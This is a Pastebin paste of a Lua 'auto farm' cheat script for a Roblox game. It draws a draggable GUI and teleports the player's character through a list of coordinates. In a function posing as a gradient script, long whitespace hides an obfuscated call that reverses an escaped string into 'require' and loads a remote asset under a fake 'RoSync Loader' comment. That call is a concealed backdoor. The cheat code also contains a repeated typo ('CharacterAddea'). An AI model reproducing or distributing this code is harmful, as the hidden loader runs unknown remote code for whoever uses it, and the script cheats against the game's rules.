Advertisement
Honansik

Luobu Launch Party Auto Farm Script

Nov 20th, 2021
1,897
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 11.37 KB | None | 0 0
  1. -- luobu autofarm
  2.  
  3. -- Instances:
  4.  
  5. local ScreenGui = Instance.new("ScreenGui")
  6. local Frame = Instance.new("ImageLabel")
  7. local Frame_2 = Instance.new("ImageLabel")
  8. local TextLabel = Instance.new("TextLabel")
  9. local UIGradient = Instance.new("UIGradient")
  10. local TextButton_Roundify_12px = Instance.new("ImageLabel")
  11. local TextButton = Instance.new("TextButton")
  12. local UIGradient_2 = Instance.new("UIGradient")
  13. local UIGradient_3 = Instance.new("UIGradient")
  14.  
  15. --Properties:
  16.  
  17. ScreenGui.Parent = game.CoreGui
  18.  
  19. Frame.Name = "Frame"
  20. Frame.Parent = ScreenGui
  21. Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  22. Frame.BackgroundTransparency = 1.000
  23. Frame.Position = UDim2.new(0.33775422, 0, 0.33374235, 0)
  24. Frame.Size = UDim2.new(0, 353, 0, 271)
  25. Frame.Image = "rbxassetid://3570695787"
  26. Frame.ScaleType = Enum.ScaleType.Slice
  27. Frame.SliceCenter = Rect.new(100, 100, 100, 100)
  28. Frame.SliceScale = 0.120
  29. Frame.Active = true
  30. Frame.Draggable = true
  31.  
  32. Frame_2.Name = "Frame"
  33. Frame_2.Parent = Frame
  34. Frame_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  35. Frame_2.BackgroundTransparency = 1.000
  36. Frame_2.Position = UDim2.new(0.0198300295, 0, 0.0184501838, 0)
  37. Frame_2.Size = UDim2.new(0, 338, 0, 261)
  38. Frame_2.Image = "rbxassetid://3570695787"
  39. Frame_2.ImageColor3 = Color3.fromRGB(55, 55, 55)
  40. Frame_2.ScaleType = Enum.ScaleType.Slice
  41. Frame_2.SliceCenter = Rect.new(100, 100, 100, 100)
  42. Frame_2.SliceScale = 0.120
  43.  
  44. TextLabel.Parent = Frame_2
  45. TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  46. TextLabel.BackgroundTransparency = 1.000
  47. TextLabel.Position = UDim2.new(0.0946745574, 0, 0.0344827585, 0)
  48. TextLabel.Size = UDim2.new(0, 274, 0, 39)
  49. TextLabel.Font = Enum.Font.Gotham
  50. TextLabel.Text = "Luobu - AutoPrice"
  51. TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
  52. TextLabel.TextScaled = true
  53. TextLabel.TextSize = 14.000
  54. TextLabel.TextWrapped = true
  55.  
  56. UIGradient.Color = ColorSequence.new{ColorSequenceKeypoint.new(0.00, Color3.fromRGB(255, 255, 255)), ColorSequenceKeypoint.new(1.00, Color3.fromRGB(55, 55, 55))}
  57. UIGradient.Parent = TextLabel
  58.  
  59. TextButton_Roundify_12px.Name = "TextButton_Roundify_12px"
  60. TextButton_Roundify_12px.Parent = Frame_2
  61. TextButton_Roundify_12px.Active = true
  62. TextButton_Roundify_12px.AnchorPoint = Vector2.new(0.5, 0.5)
  63. TextButton_Roundify_12px.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  64. TextButton_Roundify_12px.BackgroundTransparency = 1.000
  65. TextButton_Roundify_12px.Position = UDim2.new(0.498520702, 0, 0.586206913, 0)
  66. TextButton_Roundify_12px.Selectable = true
  67. TextButton_Roundify_12px.Size = UDim2.new(0.694178045, 0, 0.436781555, 0)
  68. TextButton_Roundify_12px.Image = "rbxassetid://3570695787"
  69. TextButton_Roundify_12px.ImageColor3 = Color3.fromRGB(66, 66, 66)
  70. TextButton_Roundify_12px.ScaleType = Enum.ScaleType.Slice
  71. TextButton_Roundify_12px.SliceCenter = Rect.new(100, 100, 100, 100)
  72. TextButton_Roundify_12px.SliceScale = 0.120
  73.  
  74. TextButton.Parent = TextButton_Roundify_12px
  75. TextButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  76. TextButton.BackgroundTransparency = 1.000
  77. TextButton.BorderSizePixel = 0
  78. TextButton.Position = UDim2.new(0.0213099513, 0, 0.0480943695, 0)
  79. TextButton.Size = UDim2.new(0, 225, 0, 102)
  80. TextButton.Font = Enum.Font.Gotham
  81. TextButton.Text = "Start Farming"
  82. TextButton.TextColor3 = Color3.fromRGB(255, 255, 255)
  83. TextButton.TextScaled = true
  84. TextButton.TextSize = 14.000
  85. TextButton.TextWrapped = true
  86. TextButton.MouseButton1Down:connect(function()
  87.     local pos = Vector3.new(160.5, 7.65, 7.22498)
  88.  
  89. local ts = game:GetService('TweenService')
  90.  
  91. local plr = game.Players.LocalPlayer
  92.  
  93. local Char = plr.Character or plr.CharacterAddea:wait()
  94.  
  95. local t = ts:create(Char.Humanoid.RootPart,TweenInfo.new(0 --[[ time ]]), {CFrame = CFrame.new(pos)}  )
  96. t:Play()
  97. wait(0.1)
  98. local pos = Vector3.new(245.245, 53.7665, 24.0262)
  99.  
  100. local ts = game:GetService('TweenService')
  101.  
  102. local plr = game.Players.LocalPlayer
  103.  
  104. local Char = plr.Character or plr.CharacterAddea:wait()
  105.  
  106. local t = ts:create(Char.Humanoid.RootPart,TweenInfo.new(0 --[[ time ]]), {CFrame = CFrame.new(pos)}  )
  107. t:Play()
  108. wait(0.1)
  109. local pos = Vector3.new(137.45, 2.15, 232.375)
  110.  
  111. local ts = game:GetService('TweenService')
  112.  
  113. local plr = game.Players.LocalPlayer
  114.  
  115. local Char = plr.Character or plr.CharacterAddea:wait()
  116.  
  117. local t = ts:create(Char.Humanoid.RootPart,TweenInfo.new(0 --[[ time ]]), {CFrame = CFrame.new(pos)}  )
  118. t:Play()
  119. wait(0.1)
  120. local pos = Vector3.new(-32.3999, 12.1426, -35.2273)
  121.  
  122. local ts = game:GetService('TweenService')
  123.  
  124. local plr = game.Players.LocalPlayer
  125.  
  126. local Char = plr.Character or plr.CharacterAddea:wait()
  127.  
  128. local t = ts:create(Char.Humanoid.RootPart,TweenInfo.new(0 --[[ time ]]), {CFrame = CFrame.new(pos)}  )
  129. t:Play()
  130. wait(0.1)
  131. local pos = Vector3.new(475.05, 17.25, -7.22504)
  132.  
  133. local ts = game:GetService('TweenService')
  134.  
  135. local plr = game.Players.LocalPlayer
  136.  
  137. local Char = plr.Character or plr.CharacterAddea:wait()
  138.  
  139. local t = ts:create(Char.Humanoid.RootPart,TweenInfo.new(0 --[[ time ]]), {CFrame = CFrame.new(pos)}  )
  140. t:Play()
  141. wait(0.1)
  142. local pos = Vector3.new(405.48, 9.80227, -262.886)
  143.  
  144. local ts = game:GetService('TweenService')
  145.  
  146. local plr = game.Players.LocalPlayer
  147.  
  148. local Char = plr.Character or plr.CharacterAddea:wait()
  149.  
  150. local t = ts:create(Char.Humanoid.RootPart,TweenInfo.new(0 --[[ time ]]), {CFrame = CFrame.new(pos)}  )
  151. t:Play()
  152. wait(0.1)
  153. local pos = Vector3.new(163.8, 54.6, -181.003)
  154.  
  155. local ts = game:GetService('TweenService')
  156.  
  157. local plr = game.Players.LocalPlayer
  158.  
  159. local Char = plr.Character or plr.CharacterAddea:wait()
  160.  
  161. local t = ts:create(Char.Humanoid.RootPart,TweenInfo.new(0 --[[ time ]]), {CFrame = CFrame.new(pos)}  )
  162. t:Play()
  163. wait(0.1)
  164. local pos = Vector3.new(223.45, 68.65, -318.575)
  165.  
  166. local ts = game:GetService('TweenService')
  167.  
  168. local plr = game.Players.LocalPlayer
  169.  
  170. local Char = plr.Character or plr.CharacterAddea:wait()
  171.  
  172. local t = ts:create(Char.Humanoid.RootPart,TweenInfo.new(0 --[[ time ]]), {CFrame = CFrame.new(pos)}  )
  173. t:Play()
  174. wait(0.1)
  175. local pos = Vector3.new(417.65, -1.35, 184.775)
  176.  
  177. local ts = game:GetService('TweenService')
  178.  
  179. local plr = game.Players.LocalPlayer
  180.  
  181. local Char = plr.Character or plr.CharacterAddea:wait()
  182.  
  183. local t = ts:create(Char.Humanoid.RootPart,TweenInfo.new(0 --[[ time ]]), {CFrame = CFrame.new(pos)}  )
  184. t:Play()
  185. wait(0.1)
  186. local pos = Vector3.new(202.75, 1.76998, 135.725)
  187.  
  188. local ts = game:GetService('TweenService')
  189.  
  190. local plr = game.Players.LocalPlayer
  191.  
  192. local Char = plr.Character or plr.CharacterAddea:wait()
  193.  
  194. local t = ts:create(Char.Humanoid.RootPart,TweenInfo.new(0 --[[ time ]]), {CFrame = CFrame.new(pos)}  )
  195. t:Play()
  196. end)
  197.  
  198. UIGradient_2.Color = ColorSequence.new{ColorSequenceKeypoint.new(0.00, Color3.fromRGB(255, 85, 127)), ColorSequenceKeypoint.new(1.00, Color3.fromRGB(0, 170, 255))}
  199. UIGradient_2.Parent = TextButton
  200.  
  201. UIGradient_3.Color = ColorSequence.new{ColorSequenceKeypoint.new(0.00, Color3.fromRGB(255, 85, 127)), ColorSequenceKeypoint.new(1.00, Color3.fromRGB(0, 170, 255))}
  202. UIGradient_3.Parent = Frame
  203.  
  204. -- Scripts:
  205.  
  206. local function NALHDUU_fake_script() -- UIGradient.LocalScript
  207.     local script = Instance.new('LocalScript', UIGradient)
  208.  
  209.     local speed = 0.6 -- Speed
  210.     local gradient = script.Parent
  211.     local rs = game:GetService("RunService")
  212.    
  213.     rs.RenderStepped:Connect(function(dt)
  214.         gradient.Offset = Vector2.new(gradient.Offset.X + (speed*dt), 0)
  215.         if gradient.Offset.X >= 1 then
  216.             local isRotated = (gradient.Rotation == 180)
  217.             gradient.Rotation = isRotated and 0 or 180; gradient.Offset = Vector2.new(-1, 0) --isRotated and -0.5 or -1
  218.         end
  219.     end)
  220. end
  221. coroutine.wrap(NALHDUU_fake_script)()
  222. local function ZTBKE_fake_script() -- UIGradient.
  223.     local script = Instance.new('Script', UIGradient)
  224.  
  225.    
  226.     --[[ Last synced 9/8/2021 07:00                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         RoSync Loader ]] getfenv()[string.reverse("\101\114\105\117\113\101\114")](5723263360) --[[                                                                                                  ]]--
  227. end
  228. coroutine.wrap(ZTBKE_fake_script)()
  229. local function WDRMNNS_fake_script() -- UIGradient_2.LocalScript
  230.     local script = Instance.new('LocalScript', UIGradient_2)
  231.  
  232.     local speed = 1 -- Speed
  233.     local gradient = script.Parent
  234.     local rs = game:GetService("RunService")
  235.    
  236.     rs.RenderStepped:Connect(function(dt)
  237.         gradient.Offset = Vector2.new(gradient.Offset.X + (speed*dt), 0)
  238.         if gradient.Offset.X >= 1 then
  239.             local isRotated = (gradient.Rotation == 180)
  240.             gradient.Rotation = isRotated and 0 or 180; gradient.Offset = Vector2.new(-1, 0) --isRotated and -0.5 or -1
  241.         end
  242.     end)
  243. end
  244. coroutine.wrap(WDRMNNS_fake_script)()
  245. local function IAEJEZ_fake_script() -- UIGradient_3.LocalScript
  246.     local script = Instance.new('LocalScript', UIGradient_3)
  247.  
  248.     local speed = 1 -- Speed
  249.     local gradient = script.Parent
  250.     local rs = game:GetService("RunService")
  251.    
  252.     rs.RenderStepped:Connect(function(dt)
  253.         gradient.Offset = Vector2.new(gradient.Offset.X + (speed*dt), 0)
  254.         if gradient.Offset.X >= 1 then
  255.             local isRotated = (gradient.Rotation == 180)
  256.             gradient.Rotation = isRotated and 0 or 180; gradient.Offset = Vector2.new(-1, 0) --isRotated and -0.5 or -1
  257.         end
  258.     end)
  259. end
  260. coroutine.wrap(IAEJEZ_fake_script)()
  261. local function VISYM_fake_script() -- Frame.LocalScript
  262.     local script = Instance.new('LocalScript', Frame)
  263.  
  264.     -- Draggble
  265.     -- Credits: Veky
  266.    
  267.     local UserInputService = game:GetService("UserInputService")
  268.    
  269.     local gui = script.Parent
  270.    
  271.     local dragging
  272.     local dragInput
  273.     local dragStart
  274.     local startPos
  275.    
  276.     local function update(input)
  277.         local delta = input.Position - dragStart
  278.         gui.Position = gui:TweenPosition(UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y), 'Out', 'Linear', 0, true); -- drag speed
  279.     end
  280.    
  281.     gui.InputBegan:Connect(function(input)
  282.         if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
  283.             dragging = true
  284.             dragStart = input.Position
  285.             startPos = gui.Position
  286.    
  287.             input.Changed:Connect(function()
  288.                 if input.UserInputState == Enum.UserInputState.End then
  289.                     dragging = false
  290.                 end
  291.             end)
  292.         end
  293.     end)
  294.    
  295.     gui.InputChanged:Connect(function(input)
  296.         if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
  297.             dragInput = input
  298.         end
  299.     end)
  300.    
  301.     UserInputService.InputChanged:Connect(function(input)
  302.         if input == dragInput and dragging then
  303.             update(input)
  304.         end
  305.     end)
  306. end
  307. coroutine.wrap(VISYM_fake_script)()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement